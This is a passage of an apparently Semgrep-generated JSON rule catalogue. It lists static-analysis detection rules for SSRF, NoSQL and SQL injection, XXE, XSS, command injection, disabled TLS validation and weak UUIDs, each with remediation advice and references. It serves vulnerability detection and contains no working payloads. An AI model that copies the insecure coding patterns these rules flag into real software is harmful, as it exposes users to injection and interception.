cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"help":{"markdown":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/php.lang.security.injection.tainted-url-host.tainted-url-host)\n - [https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html)\n","text":"User data flows into the host portion of this manually-constructed URL. This could allow an attacker to send data to their own server, potentially exposing sensitive data such as cookies or authorization information sent with this request. They could also probe internal servers or other resources that the server running this code can access. (This is called server-side request forgery, or SSRF.) Do not allow arbitrary hosts. Instead, create an allowlist for approved hosts, or hardcode the correct host."},"helpUri":"https://semgrep.dev/r/php.lang.security.injection.tainted-url-host.tainted-url-host","id":"php.lang.security.injection.tainted-url-host.tainted-url-host","name":"php.lang.security.injection.tainted-url-host.tainted-url-host","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: php.lang.security.injection.tainted-url-host.tainted-url-host"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"help":{"markdown":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.actix.nosql.mongodb-taint.mongodb-taint)\n - [https://docs.rs/mongodb/latest/mongodb/](https://docs.rs/mongodb/latest/mongodb/)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input might be used to build a database query, which can lead to a NoSQL injection vulnerability. An attacker can execute malicious NoSQL statements and gain unauthorized access to sensitive data, modify, delete data, or execute arbitrary system commands. Make sure all user input is validated and sanitized, and avoid using tainted user input to construct NoSQL statements if possible. Ideally, avoid raw queries and instead use parameterized queries."},"helpUri":"https://semgrep.dev/r/rust.actix.nosql.mongodb-taint.mongodb-taint","id":"rust.actix.nosql.mongodb-taint.mongodb-taint","name":"rust.actix.nosql.mongodb-taint.mongodb-taint","properties":{"precision":"very-high","tags":["CWE-943: Improper Neutralization of Special Elements in Data Query Logic","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: rust.actix.nosql.mongodb-taint.mongodb-taint"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"help":{"markdown":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2)\n - [https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29](https://owasp.org/Top10/A10_2021-Server-Side_Request_Forgery_%28SSRF%29)\n","text":"Untrusted input might be used to build an HTTP request, which can lead to a Server-side request forgery (SSRF) vulnerability. SSRF allows an attacker to send crafted requests from the server side to other internal or external systems. SSRF can lead to unauthorized access to sensitive data and, in some cases, allow the attacker to control applications or systems that trust the vulnerable service. To prevent this vulnerability, avoid allowing user input to craft the base request. Instead, treat it as part of the path or query parameter and encode it appropriately. When user input is necessary to prepare the HTTP request, perform strict input validation. Additionally, whenever possible, use allowlists to only interact with expected, trusted domains."},"helpUri":"https://semgrep.dev/r/python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","id":"python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","name":"python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2","properties":{"precision":"very-high","tags":["CWE-918: Server-Side Request Forgery (SSRF)","MEDIUM CONFIDENCE","OWASP-A10:2021 - Server-Side Request Forgery (SSRF)","security"]},"shortDescription":{"text":"Semgrep Finding: python.flask.net.tainted-flask-http-request-httplib2.tainted-flask-http-request-httplib2"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Dangerous client config used, ensure SSL verification"},"help":{"markdown":"Dangerous client config used, ensure SSL verification\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/rust.lang.security.rustls-dangerous.rustls-dangerous)\n - [https://docs.rs/rustls/latest/rustls/client/struct.DangerousClientConfig.html](https://docs.rs/rustls/latest/rustls/client/struct.DangerousClientConfig.html)\n - [https://docs.rs/rustls/latest/rustls/client/struct.ClientConfig.html#method.dangerous](https://docs.rs/rustls/latest/rustls/client/struct.ClientConfig.html#method.dangerous)\n","text":"Dangerous client config used, ensure SSL verification"},"helpUri":"https://semgrep.dev/r/rust.lang.security.rustls-dangerous.rustls-dangerous","id":"rust.lang.security.rustls-dangerous.rustls-dangerous","name":"rust.lang.security.rustls-dangerous.rustls-dangerous","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: rust.lang.security.rustls-dangerous.rustls-dangerous"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity)\n - [https://semgrep.dev/blog/2022/xml-security-in-java](https://semgrep.dev/blog/2022/xml-security-in-java)\n - [https://semgrep.dev/docs/cheat-sheets/java-xxe/](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. The current configuration allows for XXE attacks through parameter entities. It is our recommendation to secure this parser against XXE attacks by configuring $FACTORY with `$FACTORY.setFeature(http://apache.org/xml/features/disallow-doctype-decl, true)`. Alternatively, the following configurations also provide protection against XXE attacks with parameter entities. `$FACTORY.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true)` `$FACTORY.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, \"\")` `$FACTORY.setFeature(\"http://xml.org/sax/features/external-parameter-entities\", false)` Beware, using a custom EntityResolver will render these settings useless and you will be responsible for handeling security in the implementation of you EntityResolver. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","id":"java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","name":"java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.xxe.documentbuilderfactory-xxe-parameter-entity.documentbuilderfactory-xxe-parameter-entity"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account."},"help":{"markdown":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards)\n - [https://developer.apple.com/documentation/uikit/uipasteboard?language=swift](https://developer.apple.com/documentation/uikit/uipasteboard?language=swift)\n - [https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/](https://mas.owasp.org/MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0073/)\n","text":"The application was found to use named persistent pasteboards, which Apple strongly discourages and were deprecated in iOS 10. The application should use shared containers to pass data to trusted applications deployed under the same developer account."},"helpUri":"https://semgrep.dev/r/swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","id":"swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","name":"swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards","properties":{"precision":"very-high","tags":["CWE-477: Use of Obsolete Function","HIGH CONFIDENCE","security"]},"shortDescription":{"text":"Semgrep Finding: swift.lang.clipboard.named-pasteboard.swift-named-persistent-pasteboards"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"help":{"markdown":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver)\n - [https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E](https://docs.oracle.com/en/java/javase/13/security/java-api-xml-processing-jaxp-security-guide.html#GUID-D97A1F1D-8DDF-4D19-A7E5-99099F27346E)\n - [https://github.com/semgrep/java-xxe-research](https://github.com/semgrep/java-xxe-research)\n - [https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html)\n - [https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755](https://rules.sonarsource.com/java/type/Vulnerability/RSPEC-2755)\n - [https://blog.sonarsource.com/secure-xml-processor/](https://blog.sonarsource.com/secure-xml-processor/)\n - [https://blog.sonarsource.com/understanding-xxe-vulnerabilities/](https://blog.sonarsource.com/understanding-xxe-vulnerabilities/)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n - [https://cwe.mitre.org/data/definitions/776.html](https://cwe.mitre.org/data/definitions/776.html)\n","text":"The application is using an XML parser that has not been safely configured. This might lead to XML External Entity (XXE) vulnerabilities when parsing user-controlled input. An attacker can include document type definitions (DTDs) which can interact with internal or external hosts. XXE can lead to other vulnerabilities, such as Local File Inclusion (LFI), Remote Code Execution (RCE), and Server-side request forgery (SSRF), depending on the application configuration. An attacker can also use DTDs to expand recursively, leading to a Denial-of-Service (DoS) attack, also known as a Billion Laughs Attack. By setting a custom `EntityResolver` for all previous security configurations for are bypassed. It is your responsibility to handle security in the `EntityResolver` implementation instead. For more information, see: [Java XXE prevention](https://semgrep.dev/docs/cheat-sheets/java-xxe/)"},"helpUri":"https://semgrep.dev/r/java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","id":"java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","name":"java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver","properties":{"precision":"very-high","tags":["CWE-611: Improper Restriction of XML External Entity Reference","CWE-776: Improper Restriction of Recursive Entity References in DTDs ('XML Entity Expansion')","MEDIUM CONFIDENCE","OWASP-A04:2017 - XML External Entities (XXE)","OWASP-A05:2021 - Security Misconfiguration","security"]},"shortDescription":{"text":"Semgrep Finding: java.lang.security.audit.xml-custom-entityresolver.xml-custom-entityresolver"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments."},"help":{"markdown":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation)\n - [https://owasp.org/Top10/A02_2021-Cryptographic_Failures](https://owasp.org/Top10/A02_2021-Cryptographic_Failures)\n - [https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures](https://owasp.org/Top10/A07_2021-Identification_and_Authentication_Failures)\n","text":"TLS ceritificate validation is disabled. This could lead to a potential man-in-the-middle attack. This may be used for testing purposes but it is not considered safe in production deployments."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","id":"cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","name":"cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation","properties":{"precision":"very-high","tags":["CWE-295: Improper Certificate Validation","MEDIUM CONFIDENCE","OWASP-A03:2017 - Sensitive Data Exposure","OWASP-A07:2021 - Identification and Authentication Failures","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.crypto.certificate.curl-disabled-cert-validation.curl-disabled-cert-validation"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"help":{"markdown":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Untrusted input could be used to tamper with a web page rendering, which can lead to a Cross-site scripting (XSS) vulnerability. XSS vulnerabilities occur when untrusted input executes malicious JavaScript code, leading to issues such as account compromise and sensitive information leakage. To prevent this vulnerability, validate the user input, perform contextual output encoding or sanitize the input."},"helpUri":"https://semgrep.dev/r/java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","id":"java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","name":"java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","HIGH CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: java.servlets.security.servletresponse-writer-xss-deepsemgrep.servletresponse-writer-xss-deepsemgrep"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts."},"help":{"markdown":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param)\n - [https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/pages_security_tips_xss.htm](https://developer.salesforce.com/docs/atlas.en-us.apexcode.meta/apexcode/pages_security_tips_xss.htm)\n","text":"To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts. Please update your code to use either the JSENCODE method to escape URL parameters or the escape=\"true\" attribute on tags. Passing URL parameters directly into scripts and DOM sinks creates an opportunity for Cross-Site Scripting attacks. Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. To remediate this issue, ensure that all URL parameters are properly escaped before including them in scripts."},"helpUri":"https://semgrep.dev/r/generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","id":"generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","name":"generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param","properties":{"precision":"very-high","tags":["CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","MEDIUM CONFIDENCE","OWASP-A03:2021 - Injection","OWASP-A07:2017 - Cross-Site Scripting (XSS)","security"]},"shortDescription":{"text":"Semgrep Finding: generic.visualforce.security.ncino.vf.xssfromunescapedurlparam.xss-from-unescaped-url-param"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'"},"help":{"markdown":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/go.lang.security.audit.sqli.pg-sqli.pg-sqli)\n - [https://pg.uptrace.dev/](https://pg.uptrace.dev/)\n - [https://pkg.go.dev/github.com/go-pg/pg/v10](https://pkg.go.dev/github.com/go-pg/pg/v10)\n","text":"Detected string concatenation with a non-literal variable in a go-pg SQL statement. This could lead to SQL injection if the variable is user-controlled and not properly sanitized. In order to prevent SQL injection, use parameterized queries instead of string concatenation. You can use parameterized queries like so: '(SELECT ? FROM table, data1)'"},"helpUri":"https://semgrep.dev/r/go.lang.security.audit.sqli.pg-sqli.pg-sqli","id":"go.lang.security.audit.sqli.pg-sqli.pg-sqli","name":"go.lang.security.audit.sqli.pg-sqli.pg-sqli","properties":{"precision":"very-high","tags":["CWE-89: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","LOW CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: go.lang.security.audit.sqli.pg-sqli.pg-sqli"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread()."},"help":{"markdown":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread().\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-os1)\n","text":"os.preadv() is only available on Python 3.7+ and is therefore not backwards compatible. Instead, use a combination of os.readv() and os.pread()."},"helpUri":"https://semgrep.dev/r/python.lang.compatibility.python37.python37-compatibility-os1","id":"python.lang.compatibility.python37.python37-compatibility-os1","name":"python.lang.compatibility.python37.python37-compatibility-os1","properties":{"precision":"very-high","tags":[]},"shortDescription":{"text":"Semgrep Finding: python.lang.compatibility.python37.python37-compatibility-os1"}},{"defaultConfiguration":{"level":"note"},"fullDescription":{"text":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family."},"help":{"markdown":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/cpp.lang.security.system-command.dont-call-system.dont-call-system)\n - [https://owasp.org/Top10/A03_2021-Injection](https://owasp.org/Top10/A03_2021-Injection)\n","text":"Don't call `system`. It's a high-level wrapper that allows for stacking multiple commands. Always prefer a more restrictive API such as calling `execve` from the `exec` family."},"helpUri":"https://semgrep.dev/r/cpp.lang.security.system-command.dont-call-system.dont-call-system","id":"cpp.lang.security.system-command.dont-call-system.dont-call-system","name":"cpp.lang.security.system-command.dont-call-system.dont-call-system","properties":{"precision":"very-high","tags":["CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')","HIGH CONFIDENCE","OWASP-A01:2017 - Injection","OWASP-A03:2021 - Injection","security"]},"shortDescription":{"text":"Semgrep Finding: cpp.lang.security.system-command.dont-call-system.dont-call-system"}},{"defaultConfiguration":{"level":"warning"},"fullDescription":{"text":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security."},"help":{"markdown":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security.\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/python.lang.security.insecure-uuid-version.insecure-uuid-version)\n - [https://www.landh.tech/blog/20230811-sandwich-attack/](https://www.landh.tech/blog/20230811-sandwich-attack/)\n","text":"Using UUID version 1 for UUID generation can lead to predictable UUIDs based on system information (e.g., MAC address, timestamp). This may lead to security risks such as the sandwich attack. Consider using `uuid.uuid4()` instead for better randomness and security."},"helpUri":"https://semgrep.dev/r/python.lang.security.insecure-uuid-version.insecure-uuid-version","id":"python.lang.security.insecure-uuid-version.insecure-uuid-version","name":"python.lang.security.insecure-uuid-version.insecure-uuid-version","properties":{"precision":"very-high","tags":["CWE-330: Use of Insufficiently Random Values","MEDIUM CONFIDENCE","OWASP-A02:2021 - Cryptographic Failures","security"]},"shortDescription":{"text":"Semgrep Finding: python.lang.security.insecure-uuid-version.insecure-uuid-version"}},{"defaultConfiguration":{"level":"error"},"fullDescription":{"text":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)"},"help":{"markdown":"Untrusted input might be injected into a command executed by the application, which can lead to a command injection vulnerability. An attacker can execute arbitrary commands, potentially gaining complete control of the system. To prevent command injection, avoid executing OS commands with user input. If this is unavoidable, validate and sanitize the user input, and use safe methods for executing the commands. For more information, see [JavaScript command injection prevention](https://semgrep.dev/docs/cheat-sheets/java-command-injection/)\n\nReferences:\n - [Semgrep Rule](https://semgrep.dev/r/java.servlets.security.tainted-cmd-from-http-request.tainted-cmd-from-http-request)\n - [https://owasp.org/www-community/attacks/Command_Injection](https://owasp.org/www-community/attacks/Command_Injection)\n - [https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html](https://cheatsheetseries.owasp.org/cheatsheets/OS_Command_Injection_Defense_Cheat_Sheet.html)\n - 